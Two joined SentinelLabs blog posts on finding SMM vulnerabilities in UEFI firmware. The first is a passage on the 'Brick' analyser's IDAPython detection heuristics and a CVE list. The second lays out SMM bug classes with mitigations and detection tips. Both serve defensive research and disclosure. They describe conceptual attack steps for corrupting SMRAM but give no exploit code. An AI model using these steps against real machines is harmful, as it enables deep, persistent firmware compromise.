In the context of this case study, the most important feature of the postprocessor is the handling of calls to EFI_SMM_ACCESS2_PROTOCOL. In a nutshell, this protocol is used to control the visibility of SMRAM on the platform. As such, it exposes the respective methods to open, close, and lock SMRAM.

Figure 13 – interface definition for EFI_SMM_ACCESS2_PROTOCOL, source: Step to UEFI

In addition to those, this protocol also exposes a method called GetCapabilities(), which can be used by clients to query the memory controlled for the exact location of SMRAM in physical memory. Upon return, this function fills in an array of EFI_SMRAM_DESCRIPTOR structures that informs the caller what regions of SMRAM exist, what is their size, state (open vs. close), etc.

Figure 14 – documentation of the GetCapabilities() function, source: Step to UEFI

In EDK2 and its derived implementations, the common practice is to store these EFI_SMRAM_DESCRIPTORS as global variables so that they could be consumed by other functions in the future. As part of its operation, the postprocessor scans the input file for calls to GetCapabilities() and marks the SMRAM descriptors in a way that will make it easy to recover them afterward. This includes both retyping them as 'EFI_SMRAM_DESCRIPTOR *' as well as renaming them to have a unique, known prefix. The significance of this operation will be clarified shortly.

Figure 15 – Calling GetCapabilities(), before running the postprocessor
Figure 16 – Same code, after applying the postprocessor

Reconstructing the CommBuffer

Initially, the type assigned to the CommBuffer in the SMI handler’s signature is VOID *. This is adequate, as the structure of the CommBuffer is not known in advance and it’s the responsibility of the handler to correctly interpret it. Still, figuring out the internal layout of the Communication Buffer will be of great aid because it will let us know whether or not it contains nested pointers.

Usually, such tasks are completed manually as part of the reverse engineering process, but in Brick we needed to pull this off automatically. The two most prominent and successful IDA plugins for doing so are HexRaysPyTools and HexRaysCodeXplorer. Based on our experience, HexRaysPyTools produced more accurate results, while HexRaysCodeXplorer is better suited for non-interactive use. Eventually, the scriptability capabilities of HexRaysCodeXplorer tipped the scale in its favor and so it was incorporated into Brick.

Figure 17 – HexRaysCodeXplorer can be invoked from an IDAPython script

At this stage, all SMI handlers present in the image were already identified so Brick can iterate over them and invoke HexRaysCodeXplorer on the associated CommBuffer to reconstruct its internal structure. Doing so for the SMI handler from 0155.efi yields the following structure, which holds two members (field_18 and field_28) that are presumably pointers by themselves:

Figure 18 – the reconstructed structure of the Comm Buffer

How did HexRaysCodeXplorer get to this conclusion? To answer this question, let’s take a closer look at the handler’s code itself:

Figure 19 – The SMI handler forwards CommBuffer->field_18 to sub_17AC

As can be seen, during the course of its operation, the handler passes CommBuffer->field_18 as the 2nd argument to the function sub_17AC. This function, in turn, forwards it to CopyMem(), where it is used as the destination buffer. Based on the signature of CopyMem(), we know the destination buffer is in fact a pointer. That means the argument for sub_17AC is also a pointer by itself and therefore — due to the transitivity of assignments — CommBuffer->field_18 must be a pointer as well! The same logic also applied to field_28, even though we won’t show it here.

Figure 20 – The 2nd argument is forwarded as the destination buffer for CopyMem()

Resolving SmmIsBufferOutsideSmmValid

Now that it knows the CommBuffer does contain some nested pointers, Brick moves on and checks if these pointers are being sanitized properly. That is a two-fold operation:

  1. Locating the function SmmIsBufferOutsideSmmValid() in the input binary.
  2. If found, check that it is aptly used to sanitize the nested pointers.

Let’s start with resolving SmmIsBufferOutsideSmmValid(). As we mentioned in the previous part, SmmIsBufferOutsideSmmValid() is statically linked to the binary and thus locating it is not a trivial problem. To pull this off, we compiled a heuristic comprised of three conditions. Brick will iterate over all of the functions in the IDA database and try to find a function that matches all three. The heuristic goes as follows:

  1. The function at hand must receive two integer arguments – the first used as the buffer’s address and the second as its size. With the help of Bip’s API, checking for these properties is rather trivial:
    def check_arguments(f: BipFunction):
        # The arguments of the function must match (EFI_PHYSICAL_ADDRESS, UINT64)
        if (f.type.nb_args == 2 and \
            isinstance(f.type.get_arg_type(0), BTypeInt) and \
            isinstance(f.type.get_arg_type(1), BTypeInt)):
            return True
        else:
            return False
    

    Figure 21 – Matching the arguments of SmmIsbufferOutsideSmmValid

  2. The function at hand must return a BOOLEAN value. From the perspective of the decompiler, BOOLEAN values are just plain integers, so if we want to make this distinction we must go over all the return statements in the function and check if the returned value is a member of the set {0,1}. In Bip, this can also be accomplished very easily:
    def check_return_type(f: BipFunction):
        if not isinstance(f.type.return_type, BTypeInt):
            # Return type is not something derived from an integer.
            return False
     
        def inspect_return(node: CNodeStmtReturn):
            if not isinstance(node.ret_val, CNodeExprNum) or node.ret_val.value not in (0, 1):
                # Not a boolean value.
                return False
     
        # Run 'inspect_return' on all return statements in the function.
        return f.hxcfunc.visit_cnode_filterlist(inspect_return, [CNodeStmtReturn])
    

    Figure 22 – Checking the function actually returns a BOOLEAN value

  3. Lastly, we know that SmmIsBufferOutsideSmmValid() uses an array of EFI_SMRAM_DESCRIPTORS to keep track of active SMRAM ranges, so we expect the candidate function to reference at least one of them. Because global EFI_SMRAM_DESCRIPTORS were already marked earlier by the postprocessor, checking for xrefs between the function and the descriptors becomes straightforward:
    def references_smram_descriptor(f: BipFunction):
        # The function must reference at least one SMRAM descriptor.
        for smram_descriptor in BipElt.get_by_prefix('gSmramDescriptor'):
            if f in smram_descriptor.xFuncTo:
                return True
        else:
            # No xref to SMRAM descriptor.
            return False
    

    Figure 23 – Checking the function references an EFI_SMRAM_DESCRIPTOR

Are these heuristics bulletproof and guarantee they will always match SmmIsBufferOutsideSmmValid() in the binary? Of course not! But more often than not they do the trick, and that’s what matters. In the HP case, the heuristics didn’t fail and managed to find a proper match:

Figure 24 – Matching SmmIsBufferOutsideSmmValid()

Nested Pointers Validation

Once SmmIsBufferOutsideSmmValid() is matched, Brick verifies it is being used properly by the SMI handler. For that, it iterates over all calls to SmmIsBufferOutsideSmmValid() and tries to deduce if all nested pointers are being covered by it. In 0155.efi, it notices there is only one call to SmmIsBufferOutsideSmmValid() that is used to validate field_28. That implies no validation takes place over the second nested pointer, namely field_18, so it flags the handler as vulnerable.

Figure 25 – SmmIsBufferOutsideSmmValid validates one field while neglecting the other one

To be fair, we were quite lucky to encounter such a clear-cut case as the one above. If the control flow was a bit more convoluted, there is a decent chance Brick’s verdict would become more ambiguous.

Impact

We already saw that depending on the exact flow the handler takes, it might end up calling sub_17AC. This function gets an argument that is derived from CommBuffer->field_18 and will later forward it as the destination address for CopyMem(). The contents of the CommBuffer are fully controllable by the attacker and, leveraging the missing validation, he or she can craft a buffer whose field_18 points to an arbitrary SMRAM address of their choice. As a result, the SMRAM region pointed to by that address will get corrupted by the time CopyMem() gets called.

Figure 26 - CommBuffer->field18 is passed from SmiHandler through sub_17AC and ends up at CopyMem
Figure 26 – CommBuffer->field18 is passed from SmiHandler through sub_17AC and ends up at CopyMem

How to cause the handler to actually call sub_17AC, and how to promote this memory corruption into an arbitrary code execution in SMM are left as exercises to the diligent reader.

Low SMRAM Corruption

In addition to the nested pointer vulnerability present in 0155.efi, the HP firmware image also suffered from 5 additional, less severe issues that enable attackers to corrupt the low portion of SMRAM. All five vulnerabilities are isomorphic to each other, so we’ll focus on the simplest case found in 017D.efi:

Figure 27 – Low SMRAM corruption discovered in 017D.efi

As we mentioned in the previous post, these vulnerabilities arise when an SMI handler writes data to the communication buffer without first validating its size. Attackers can place the CommBuffer just below SMRAM, which will cause unintended corruption once the handler performs the write to it.

We also noted that SMI handlers can shield themselves from these problems by performing one or both of the following actions:

  1. Calling SmmIsBufferOutsideSmmValid on the CommBuffer with the exact size expected by the handler.
  2. Dereferencing the provided CommBufferSize argument (a pointer to an integer value holding the size of the buffer), then comparing the result against the expected size.

Therefore, to detect this class of vulnerabilities, Brick searches for SMI handlers that omit both checks. Unlike the previous case, this time the heuristics employed to resolve SmmIsBufferOutsideSmmValid() bore no fruit, so Brick simply assumes it’s absent from the binary and moves on to check if CommBufferSize is being dereferenced. This is achieved by traversing the AST associated with the handler, looking for nodes that correspond to a dereference operation (cot_ptr in the Hex-Rays terminology). The child node of a dereference operation in the tree represents the variable being dereferenced, so Brick can check if it’s CommBufferSize.

Figure 28 – The portion of the AST that corresponds to dereferencing CommBufferSizejust above

If such a pair of nodes is found, it tells us that the C source code for the handler contained the expression: *CommBufferSize, so we can assume the programmer intended to compare that value against some anticipated size.

Figure 29 – The corresponding C source code for the dereference operator

Using Bip, implementing this heuristic is easy and only takes a handful of Python lines:

def dereferences_CommBufferSize(handler: BipFunction):
    # CommBufferSize is the 3rd argument of the SMI handler
    CommBufferSize = handler.hxcfunc.args[2]
 
    if not CommBufferSize._lvar.used:
        # CommBufferSize is not touched at all.
        return False
 
    def inspect_dereference(node: CNodeExprPtr):
        child = node.ops[0].ignore_cast
 
        if isinstance(child, CNodeExprVar) and child.lvar == CommBufferSize:
            # This is confusing, we return False just to signal the search to stop.
            return False
 
    # Run 'insepct_dereference' on all dereference expressions in the function.
    return not handler.hxcfunc.visit_cnode_filterlist(inspect_dereference, [CNodeExprPtr])

Figure 29 – Implementing the heuristic in python

Unfortunately, this heuristic yields no results, so Brick now knows CommBufferSize is not being dereferenced and as a result marks the handler as vulnerable.

Figure 31 - Brick’s assessment of 017D.efi
Figure 30 – Brick’s assessment of 017D.efi

Conclusion

As can be judged by the number of CVEs it has already generated, we believe Brick is a very promising project that takes a big step in the right direction of harnessing automation to streamline the bug hunting process. This feeling we have was even reinforced recently when a related project called FwHunt was released. FwHunt attempts to solve the same set of problems as Brick, only using strict rule-sets rather than more relaxed heuristics.

Using automation, rules, heuristics, and other static code analysis techniques to crack through complex problems are very much desirable, but it’s always important to remember that reality is more complex than how we describe it. As such, occasional edge conditions that cause Brick and other automated tools to generate false positives and false negatives from time to time are inevitable.

That is perfectly acceptable, as long as we keep in mind that these tools were never intended to fully replace a human analyst, but rather empower him to handle larger and larger quantities of data. Eventually, it’s not the tool itself that makes the difference, but rather the human being that chooses how to use it, on what targets, and how to interpret its findings.

If you’re interested in learning more about the subject, come attend the upcoming Insomnihack conference, where we will be delivering a talk about some more SMM vulnerabilities, found this time in the Intel codebase.

See you there!

Appendix A – List of CVEs by Brick

CVE ID CVSS score Vendor
CVE-2021-36342 7.5 Dell
CVE-2021-44346 ? Gigabyte
CVE-2021-0157 8.2 Intel
CVE-2021-0158 8.2 Intel
CVE-2021-42055 6.8 ASUS
CVE-2021-3599 6.7 Lenovo
CVE-2021-3786 5.5 Lenovo
CVE-2022-23956 8.2 HP
CVE-2022-23953 7.9 HP
CVE-2022-23954 7.9 HP
CVE-2022-23955 7.9 HP
CVE-2022-23957 7.9 HP
CVE-2022-23958 7.9 HP

Appendix B – References and Further Reading

✇SentinelLabs

Zen and the Art of SMM Bug Hunting | Finding, Mitigating and Detecting UEFI Vulnerabilities

By: Assaf Carlsbad

It’s been almost a full year since we published the last part of our UEFI blog posts series. During that period, the firmware security community has been was more active than ever and produced several high-quality publications. Notable examples include the discovery of new UEFI implants such as MoonBounce and ESPecter, and the recent disclosure of no less than 23 high-severity BIOS vulnerabilities by Binarly.

Here at SentinelOne, we haven’t been sitting idle either. In the past year, we tried our hand at hunting down and exploiting SMM vulnerabilities. After spending several months doing so, we noticed some repetitive anti-patterns in SMM code and developed a pretty good intuition regarding the potential exploitability of bugs. Eventually, we managed to conclude 2021 after having disclosed 13 such vulnerabilities, affecting most of the well-known OEMs in the industry. In addition, several more vulnerabilities are still moving through the responsible disclosure pipeline and should go public soon.

In this blog post, we would like to share the knowledge, tools, and methods we developed to help uncover these SMM vulnerabilities. We hope that by the time you finish reading this article, you too will be able to find such firmware vulnerabilities yourselves. Please note that this article assumes a solid knowledge of SMM terminology and internals, so if your memory needs a refresher we highly recommend reading the articles in the Further Reading section before proceeding. And now, let’s get started.

Classes of SMM Vulnerabilities

While in theory SMM code is isolated from the outside world, in reality, there are many circumstances in which non-SMM code can trigger and even affect code running inside SMM. Because SMM has a complex architecture with lots of “moving parts” in it, the attack surface is pretty vast and contains among other things data passed in communication buffers, NVRAM variables, DMA-capable devices, and so on.

In the following section, we will go through some of the more common SMM security vulnerabilities. For each vulnerability type, we will provide a brief description, some recommended mitigations as well as a strategy for detecting it while reversing. Note that the list of vulnerabilities is not exhaustive and contains only vulnerabilities that are specific to the SMM environment. For that reason, it will not include more generic bugs such as stack overflows and double-frees.

SMM Callouts

The most basic SMM vulnerability class is known as an “SMM callout”. This occurs whenever SMM code calls a function located outside of the SMRAM boundaries (as defined by the SMRRs). The most common callout scenario is an SMI handler that tries to invoke a UEFI boot service or runtime service as part of its operation. Attackers with OS-level privileges can modify the physical pages where these services live prior to triggering the SMI, thus hijacking the privileged execution flow once the affected service is called.

Figure 1 – Schematic overview of an SMM callout, source: CanSecWest 2015

Mitigation

Besides the obvious approach of not writing such faulty code in the first place, SMM callouts can also be mitigated at the hardware level. Starting from the 4th generation of the Core microarchitecture (Haswell) Intel CPUs support a security feature called SMM_Code_Chk_En. If this security feature is turned on, the CPU is prohibited from executing any code located outside the SMRAM region once it enters SMM. One can think of this feature as the SMM equivalent of Supervisor Mode Execution Prevention (SMEP).

Querying for the status of this mitigation can be done by executing the smm_code_chk module from CHIPSEC.

Figure 2 – Using chipsec to query for the hardware mitigation against SMM callouts

Detection

Static detection of SMM callouts is pretty straightforward. Given an SMM binary, we should analyze it while looking for SMI handlers that have some execution flow that leads to calling a UEFI boot or runtime service. This way, the problem of finding SMM callouts is reduced to the problem of searching the call graph for certain paths. Luckily for us, no additional effort is required at all since this heuristic is already implemented by the excellent efiXplorer IDA plugin.

As we mentioned in previous posts in the series, efiXplorer is a one-stop-shop and serves as the de-facto standard way of analyzing UEFI binaries with IDA. Among other things, it takes care of the following:

  • Locating and renaming known UEFI GUIDs
  • Locating and renaming SMI handlers
  • Locating and renaming UEFI boot/runtime services
  • Recent versions of efiXplorer use the Hex-Rays decompiler to improve analysis. One such feature is the ability to assign the correct type to interface pointers passed to methods such as LocateProtocol() or its SMM counterpart SmmLocateProtocol().

A note to Ghidra users: We also want to add that the Ghidra plugin efiSeek takes care of all the changes in the list above. However, it doesn’t include the UI elements like the protocols window and the vulnerability detection capabilities offered by efiXplorer.

After analysis of the input file is complete, efiXplorer will move on to inspect all calls carried out by SMI handlers, which yields a curated listing of potential callouts:

Figure 3 – Callouts found by efiXplorer
Figure 4 – sub_7F8 is reachable from an SMI handler but still calls a boot service located outside of SMRAM

For the most part, this heuristic works great, but we’ve encountered several edge cases where it might generate some false positives as well. The most common one is caused due to the usage of EFI_SMM_RUNTIME_SERVICES_TABLE. This is a UEFI configuration table that exposes the exact same functionality as the standard EFI_RUNTIME_SERVICES_TABLE, with the only significant difference being that, unlike its “standard” counterpart, it resides in SMRAM and is therefore suitable to be consumed by SMI handlers. Many SMM binaries often re-map the global RuntimeServices pointer to the SMM-specific implementation after completing some boilerplate initialization tasks:

Figure 5 – Remapping the global RuntimeService pointer to the SMM-compatible implementation

Calling runtime services via the re-mapped pointer yields a situation that appears to be a callout at first glance, though a closer examination will prove otherwise. To overcome this, analysts should always search the SMM binary for the GUID identifying EFI_SMM_RUNTIME_SERVICES_TABLE. If this GUID is found, chances are that most of the callouts involving UEFI runtime services are false positives. This does not apply to callouts involving boot services, though.

Figure 6 – A false positive caused by calling GetVariable() via the re-mapped RuntimeService pointer

Another source of potential false positives is various wrapper functions which are “dual-mode”, meaning they can be called from both SMM and non-SMM contexts. Internally, these functions dispatch a call to an SMM service if the caller is executing in SMM, and dispatches a call to the equivalent boot/runtime service otherwise. The most common example we’ve seen in the wild is FreePool() from EDK2, which calls gSmst->SmmFreePool() if the buffer to be freed resides in SMRAM, or calls gBs->FreePool() otherwise.

Figure 7 – The FreePool() utility functions from EDK2 is a common source of false positives

As this example demonstrates, bug hunters should be aware of the fact that static code analysis techniques are having a hard time determining that certain code paths won’t be executed in practice, and as such are likely to flag this as a callout. Some tips and tricks for identifying this function in compiled binaries will be conveyed in the Identifying Library Functions section.

Low SMRAM Corruption

Description

Under normal circumstances, the communication buffer used to pass arguments to the SMI handler must not overlap with SMRAM. The rationale for this restriction is quite simple: if that wasn’t the case, any time the SMI handler would write some data into the comm buffer — for example, in order to return a status code to the caller — it would also modify some portion of SMRAM along the way, which is undesirable.

Figure 8 – This situation should not occur

In EDK2, the function responsible for checking whether or not a given buffer overlaps with SMRAM is called SmmIsBufferOutsideSmmValid(). This function gets called on the communication buffer upon each SMI invocation in order to enforce this restriction.

Figure 9 – EDK2 forbids the comm buffer from overlapping with SMRAM

Alas, since the size of the communication buffer is also under the attacker’s control this check on its own is not enough to guarantee sound protection and some additional responsibilities lay on the shoulders of the firmware developers. As we will see shortly, many SMI handlers fail here and leave a gap attackers can exploit to violate this restriction and corrupt the bottom portion of SMRAM. To understand how, let’s take a closer look at a concrete example:

Figure 10 – A vulnerable SMI handler

Above we have a real-life, very simple SMI handler. We can divide its operation into 4 discrete steps:

  1. Sanity checking the arguments.
  2. Reading the value of the MSR_IDT_MCR5 register into a local variable.
  3. Computing a 64-bit value out of it, then writing the result back to the communication buffer.
  4. Return to the caller.

The astute reader might be aware of the fact that during step 3, an 8-byte value is written to the Comm Buffer, but nowhere during step 1 does the code check for the prerequisite that the buffer is at least 8 bytes long. Because this check is omitted, an attacker can exploit this by:

  1. Placing the Comm Buffer in a memory location as adjacent as possible to the base of SMRAM (say SMRAM – 1).
  2. Set the size of the Comm Buffer to a small enough integer value, say 1 byte.
  3. Trigger the vulnerable SMI. Schematically, the memory layout would look as follows:
Figure 11 – Memory layout at the time of SMI invocation

As far as SmmEntryPoint is concerned, the Comm Buffer is just 1 byte long and does not overlap with SMRAM. Because of that, SmmIsBufferOutsideSmmValid() will succeed and the actual SMI handler will be called. During step 3, the handler will blindly write a QWORD value into the Comm Buffer, and by doing so it will unintentionally write over the lower 7 bytes of SMRAM as well.

Figure 12 – Memory layout at the time of corruption

Based on EDK2, the bottom portion of TSEG (the de-facto standard location for SMRAM), contains a structure of type SMM_S3_RESUME_STATE whose job is to control recovery from the S3 sleep state. As can be seen below, this structure contains a plethora of members and function pointers whose corruption can benefit the attacker.

Figure 13 – Definition for the SMM_S3_RESUME_STATE object, source: EDK2

Mitigation

To mitigate this class of vulnerabilities, SMI handlers must explicitly check the size of the provided communication buffer and bailout in case the actual size differs from the expected size. This can be achieved in one of two ways:

  1. Dereferencing the provided CommBufferSize argument and then comparing it to the expected size. This method works because we already saw that SmmEntryPoint calls SmmIsBufferOutsideSmmValid(CommBuffer, *CommBufferSize), which guarantees *CommBufferSize bytes of the buffer are located outside of SMRAM.

    Figure 14 – Mitigating low SMRAM corruption can be achieved simply by checking the CommBufferSize argument

  2. Calling SmmIsBufferOutsideSmmValid() on the Comm Buffer again, this time with the concrete size expected by the handler.

Detection

To detect this class of vulnerabilities, we should be looking for SMI handlers that don’t properly check the size of the Comm Buffer. That suggests the handler does not perform any of the following:

  1. Dereferences the CommBufferSize argument.
  2. Calls SmmIsBufferOutsideSmmValid() on the communication buffer.

Condition 1 is straightforward to check because efiXplorer already takes care of locating SMI handlers and assigning them their correct function prototype. Condition 2 is also easy to validate, but the crux is this: since SmmIsBufferOutsideSmmValid() is statically linked to the code, we must be able to identify it in the compiled binary. Some tips and tricks for doing so can be found in the next section.

Arbitrary SMRAM Corruption

Description

While certainly a big step forward in our analysis of SMM vulnerabilities, the previous bug class still suffers from several significant limitations that hinder it from being easily exploited in real-life scenarios. A better, more powerful exploitation primitive will allow us to corrupt arbitrary locations within SMRAM, not only those that are adjacent to the bottom.

Such exploitation primitives can often be found in SMI handlers whose communication buffers contain nested pointers. Since the internal layout of the communication buffer is not known apriori, it is the responsibility of the SMI handler itself to correctly parse and sanitize it, which usually boils down to calling SmmIsBufferOutsideSmmValid() on nested pointers and bailing out if one of them happens to overlap with SMRAM. A textbook example for properly checking these conditions can be found in the SmmLockBox driver from EDK2:

Figure 15 – the sub-handler for SmmLockBoxSave sanitizes nested pointers

To report back to the OS that certain best practices have been implemented in SMM, a modern UEFI firmware usually creates and populates an ACPI table called the Windows SMM Mitigations Table, or WSMT for short. Among other things, the WSMT maintains a flag called COMM_BUFFER_NESTED_PTR_PROTECTION that, if present, asserts that no nested pointers are used by SMI handlers without prior sanitization. This table can be dumped and parsed using the chipsec module common.wsmt:

Figure 16 – Using CHIPSEC to dump and parse the contents of the WSMT table

Unfortunately, practice has shown that more often than not, the correlation between reported mitigations and reality is scarce at best. Even when the WSMT is present and reports all the supported mitigations as active, it’s not uncommon to discover SMM drivers that completely forget to sanitize the communication buffer. Leveraging this, attackers can trigger the vulnerable SMI with a nested pointer pointing to SMRAM memory. Depending on the nature of the particular handler, this can result in either corruption of the specified address or disclosure of sensitive information read from that address. Let’s take a look at an example.

Figure 17 – An SMI handler that does not sanitize nested pointers, leaving it vulnerable to memory corruption attacks

In the snippet above, we have an SMI handler that gets some arguments via the communication buffer. Based on the decompiled pseudocode, we can deduce that the first byte of the buffer is interpreted as an OpCode field that instructs the handler what it should do next (1). As can be seen (2), valid values for this field are either 0, 2, or 3. If the actual value differs from those, the default clause (3) will be executed. In this clause, an error code is written to the memory location pointed to by the 2nd field of the comm buffer. Since this field is under the attacker’s control along with the entire contents of the communication buffer, he or she can set it up as follows prior to triggering the SMI:

Figure 18 – Contents of the communication buffer that lead to SMRAM corruption

As the handler executes, the value of the OpCode field will force it to fall back into the default clause, while the address field will be selected in advance by the attacker depending on the exact portion of SMRAM he or she wants to corrupt.

Mitigation

To mitigate this class of vulnerabilities, the SMI handler must sanitize any pointer value passed in the communication buffer prior to using it. The pointer validation can be performed in one of two ways:

  • Calling SmmIsBufferOutsideSmmValid(): As was already mentioned, SmmIsBufferOutsideSmmValid() is a utility function provided by EDK2 that checks whether or not a given buffer overlaps with SMRAM. Using it is the recommended way to sanitize external input pointers.
  • Alternatively, some UEFI implementations based on the AMI codebase don’t use SmmIsBufferOutsideSmmValid(), but rather expose a similar functionality via a dedicated protocol called AMI_SMM_BUFFER_VALIDATION_PROTOCOL. Besides the semantic differences of calling a function versus utilizing a UEFI protocol, both approaches work roughly the same. Please check out the next section to learn how to correctly import this protocol definition into IDA.
    Figure 19 – AMI_SMM_BUFFER_VALIDATION_PROTOCOL is action

Detection

The basic idea to detect this class of vulnerabilities is to look for SMI handlers that don’t call SmmIsBufferOutsideSmmValid() or utilize the equivalent AMI_SMM_BUFFER_VALIDATION_PROTOCOL. However, some edge cases must also be taken into consideration. Failing to do so might introduce unwanted false positives or false negatives.

  1. Calling SmmIsBufferOutsideSmmValid() on the comm buffer itself: this merely guarantees that the comm buffer does not overlap with SMRAM (see Low SMRAM corruption below), but it says nothing about the nested pointers. As a result, when trying to assess the robustness of a handler against rouge pointer values, these cases should not be taken into consideration.
  2. Not using nested pointers at all: Some SMI handlers might not call SmmIsBufferOutsideSmmValid() simply because the communication buffer does not hold any nested pointers, but rather other data types such as integers, boolean flags, etc. To distinguish between this benign case from the vulnerable case, we must be able to figure out the internal layout of the communication buffer.

    While this can be done manually as part of the reverse engineering process, fortunately for us, nowadays automatic type reconstruction is far from being science fiction, and various tools for doing so are readily available as off-the-shelf solutions. The two most prominent and successful IDA plugins in this category are HexRaysPyTools and HexRaysCodeXplorer. Using any of these tools lets you transform raw pointer access notation such as the following:

    Figure 20 – SMI handler using the raw CommBuffer

    Into a more friendly and comprehensible point-to-member notation:

    Figure 21 – SMI handler using the reconstructed CommBuffer

    Even more importantly, these plugins keep track of how individual fields are being accessed. Based on the access pattern, they are fully capable of reconstructing the layout of the containing structure. This includes extrapolating the number of members, their respective sizes, types, attributes, and so on. When applied to the Comm Buffer, this method lets you quickly discover if it holds any nested pointers.

    Figure 22 – The reconstructed CommBuffer as extrapolated by HexRaysCodeXplorer. Notice this structure holds two members which are nested pointers

TOCTOU attacks

Description

Sometimes, even calling SmmIsBufferOutsideSmmValid() on nested pointers is not enough to make an SMI handler fully secure. The reason for this is that SMM was not designed with concurrency in mind and as a result, it suffers from some inherent race conditions, the most prominent one being TOCTOU attacks against the communication buffer. Because the comm buffer itself resides outside of SMRAM, its contents can change while the SMI handler is executing. This fact has serious security implications as it means double-fetches from it won’t necessarily yield the same values.

In an attempt to remedy this, SMM in multiprocessing environments follows what’s known as an “SMI rendezvous”. In a nutshell, once a CPU enters SMM a dedicated software preamble will send an Inter-Processor-Interrupt (IPI) to all other processors in the system. This IPI will cause them to enter SMM as well and wait there for the SMI to complete. Only then can the first processor safely call the handler function to actually service the SMI.

This scheme is highly effective in preventing other processors from meddling with the communication buffer while it is being used, but of course, CPUs are not the only entities that have access to the memory bus. As any OS 101 course teaches you, nowadays many hardware devices are capable of acting as DMA agents, meaning they can read/write memory without going through the CPU at all. These are great news performance-wise but are terribly bad news as far as firmware security is concerned.

Figure 23 – DMA-aware hardware can modify the contents of the comm buffer while an SMI is executing, source: Dell Firmware Security

To see how DMA operations can assist exploitation, let’s take a look at the following snippet taken from a real-life SMI handler:

Figure 24 – SMI handler that is vulnerable to a TOCTOU attack

As can be seen, this handler references a nested pointer that we named field_18 in at least 3 different locations:

  1. First, its value is retrieved from the comm buffer and saved into a local variable in SMRAM.
  2. Then, SmmIsBufferOutsideSmmValid() is called on the local variable to make sure it does not overlap SMRAM.
  3. If deemed safe, the nested pointer is re-read from the comm buffer and then passed to CopyMem() as the destination argument.

As was mentioned earlier, nothing guarantees consecutive reads from the comm buffer will necessarily yield the same value. That means an attacker can issue this SMI with the pointer referencing a perfectly safe location outside of SMRAM:

Figure 25 – Initial layout of the communication buffer at the time of issuing the SMI

However, right after the SMI validates the nested pointer and just before it is being fetched again, there exists a small window of opportunity where a DMA attack can modify its value to point somewhere else. Knowing that the pointer will soon be passed to CopyMem(), the attacker could make it point to an address in SMRAM he wants to corrupt.

Figure 26 – A malicious DMA device can modify the pointer inside the CommBuffer to point somewhere else, potentially to SMRAM memory

Mitigation

If configured properly by the firmware, SMRAM should be shielded from tampering by DMA devices. To make sure that’s the case on your machine, run the smm_dma module from CHIPSEC.

Figure 27 – Checking that SMRAM is protected from DMA attacks

Because of that, mitigating TOCTOU vulnerabilities can be performed merely by copying data from the communication buffer into local variables that reside in SMRAM. Like always, a good reference for the proper coding style is EDK2:

Figure 28 – Copying data from the comm buffer into local variables in SMRAM, source: SmmLockBox.c

Once all the required pieces of data are copied into SMRAM that way, DMA attacks won’t be able to influence the execution flow of SMI handlers:

Figure 29 – If configured properly, SMRAM should be protected from tampering by DMA devices

Detection

Detecting TOCTOU vulnerabilities in SMI handlers requires reconstructing the internal layout of the communication buffer, then counting how many times each field is being fetched. If the same field is being fetched twice or more by the same execution flow, chances are the respective handler is susceptible to such attacks. The severity of these issues greatly depends on the types of individual fields, with pointer fields being the most acute ones. Again, properly reconstructing the structure of the Comm Buffer greatly helps in assessing the potential risk.

CSEG-only Aware Handlers

Description

As was mentioned by previous posts in the series, the de-facto standard location for SMRAM memory is the “Top Memory Segment”, often abbreviated as TSEG. Still, on many machines, a separate SMRAM region called CSEG (Compatibility Segment) co-exists with TSEG for compatibility reasons. Unlike TSEG whose location in physical memory can be programmed by the BIOS, the location of the CSEG region is fixed to the address range 0xA0000-0xBFFFF. Some legacy SMI handlers were designed with only CSEG in mind, a fact that can be abused by attackers. Below is an example of one such handler:

Figure 30 – An SMI handler with some CSEG-specific protections

Unlike the handlers we reviewed so far, this SMI handler does not get its arguments via the communication buffer. Instead, it uses the EFI_SMM_CPU_PROTOCOL to read registers from the SMM save state, created automatically by the CPU upon entering SMM. Therefore, the potential attack surface in this example is not the communication buffer, but rather the general-purpose registers of the CPU, whose values can be set almost arbitrarily prior to issuing the SMI.

The handler goes as follows:

  1. First, it reads the values of the ES and EBX registers from the save state.
  2. Then, it computes a linear address from them using the formula: 16 * ES + (EBX & 0xFFFF).
  3. Finally, it checks that the computed address does not fall within the bounds of CSEG. If the address is considered safe, it is passed as an argument to the function at 0x3020.

Note that the handler essentially re-implements common utility functions such as SmmIsBufferOutsideSmmValid(), only it does so in a poor way that completely neglects SMRAM segments other than CSEG. Theoretically, attackers can set the ES and BX registers such that the computed linear address will point to some other SMRAM region such as TSEG and will surely pass the safety checks imposed by the handler.

In practice, however, chances are this vulnerability is not realistically exploitable. The reason for this is that the maximal linear address we can reach is limited to 16 * 0xFFFF + 0xFFFF == 0x10FFEF, and experience shows that TSEG is usually located at much higher addresses. Nevertheless, it is a good thing to be aware of such handlers and the danger they impose.

Mitigation

Mitigating these vulnerabilities is entirely up to the developers of the SMI handler.

Detection

A good strategy to pinpoint these cases is to look for SMI handlers that make use of “magic numbers” that reference some unique characteristics of CSEG. These include immediate values such as 0xA0000 (the physical base address of CSEG), 0x1FFFF (its size), and 0xBFFFF (last addressable byte). Based on our experience, a function that uses two or more of these values is likely to have some CSEG-specific behavior and must be examined carefully to assess its potential risk.

SetVariable() Information Disclosure

Description

All the bug classes described so far were centered around hijacking the SMM execution flow and corrupting SMM memory. Yet another very important category of vulnerabilities revolves around disclosing the contents of SMRAM. It is a known fact that SMRAM cannot be read from outside of SMM, which is why it is sometimes used by the firmware to store secrets that must be kept hidden from the outside world. In addition to that, disclosing the contents of SMRAM can also help with the exploitation of other vulnerabilities that require accurate knowledge of the memory layout.

A common scenario for SMRAM disclosure happens when SMM code tries to update the contents of an NVRAM variable. In UEFI, updating an NVRAM variable is not an atomic operation, but rather a composite one made out of the following steps:

  1. Allocating a stack buffer that will hold the data associated with the variable.
  2. Using the GetVariable() service to read the contents of the variable into the stack buffer.
  3. Performing all the required modifications on the stack buffer.
  4. Using the SetVariable() service to write the modified stack buffer back to NVRAM.
Figure 31 – UEFI code that demonstrates updating a UEFI variable. Source: TCGSmm

When calling GetVariable(), note that the 4th parameter is used as an input-output argument. Upon entry, this argument signifies the number of bytes the caller is interested in reading, while on return it is set to the number of bytes that were read from NVRAM in practice. In case the actual size of the variable matches the expected one, both values should be the same.

A problem arises when developers implicitly assume the size of a variable to be immutable. Due to this assumption, they completely ignore the number of bytes read by GetVariable() and just pass a hardcoded size to SetVariable() when writing the updated contents:

Figure 32 – the code above implicitly assumes the size of CpuSetup will always be 0x101A, so it doesn’t bother to check the number of bytes actually read by GetVariable()

